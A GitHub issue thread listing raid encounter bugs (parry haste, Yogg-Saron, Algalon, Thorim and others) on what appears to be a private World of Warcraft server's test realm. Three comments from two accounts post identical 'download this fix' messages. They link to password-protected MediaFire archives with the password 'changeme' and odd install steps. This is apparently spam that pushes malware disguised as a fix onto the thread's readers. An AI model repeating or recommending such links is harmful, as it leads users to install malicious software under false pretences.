### ISSUE TITLE
PTR-Ulduar25n 24/08/24 remaining bugs

### ISSUE THREAD

**Issue by Manpower99** [gamefreedomgit/Frostmourne#1670]
[//]: # (REMBEMBER! Add links to things related to the bug using for example:)
[//]: # (https://www.wowhead.com/wotlk)

**Description:**
1. Parry Haste Issue not fixed despite changelog saying it is https://github.com/gamefreedomgit/Frostmourne/issues/1612
 Today's 25n PTR session Vezax was Parry-Hasting and Thorim and Auriaya were not.
 
2. Defeating Thorim doesn't despawn spells/enviromental damage Blizzard/Chain Lightning from pillars until the Roleplay is over, should despawn it upon defeat/encounter over instead.

3. Yogg-Saron Death Rays seem to be actually chasing targets instead of just going on a movement pattern sometimes. Radius could also be bigger than it should be.

4. Algalon Constellations Still not responding to taunts/dont have target or swapping. not tauntable = meaning algalon is not really doable since they will run around and close Black Holes as they wish instead of being controllable. https://github.com/gamefreedomgit/Frostmourne/issues/1619

5. Yogg-Saron Crusher Tentacles are instantly recasting Diminish Power as it gets interrupted. should have a delay instead. https://github.com/gamefreedomgit/Frostmourne/issues/1664

6. https://github.com/gamefreedomgit/Frostmourne/issues/1668 alot of bugs in Yogg-Saron atm. much more difficult than it needs to be on 25N due to these bugs and pre nerf tuning being mixed into it. i would recommend to prioritize this bug report due to its importance to the upcoming release.

7. the Walk/Path towards Flame Leviathan area has no Pyrite in the air whatsoever, https://youtu.be/ewxLBdYTrPg?si=LkV8jViY3gmkN9uK&t=81 you can see here they're shooting in the air and pyrite is dropping.

8. Amount of trash pre mimiron still incorrect https://github.com/gamefreedomgit/Frostmourne/issues/1464

9. Cooldown/sated resets are not working. i'm unsure if they were intentionally disabled this time or not but after boss kills we had to .cooldown  / Might be related to that we are not actually killing the bosses but rather some are being defeated at 2% hp.

**Database links:**

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Manpower99** [comment]
> fixed
> 
> Parry haste should work after last update, let me know if there are any issues left with it.

Today (live testing), same issue, Vezax is Parry hasting and Mimiron and Auriaya are not.
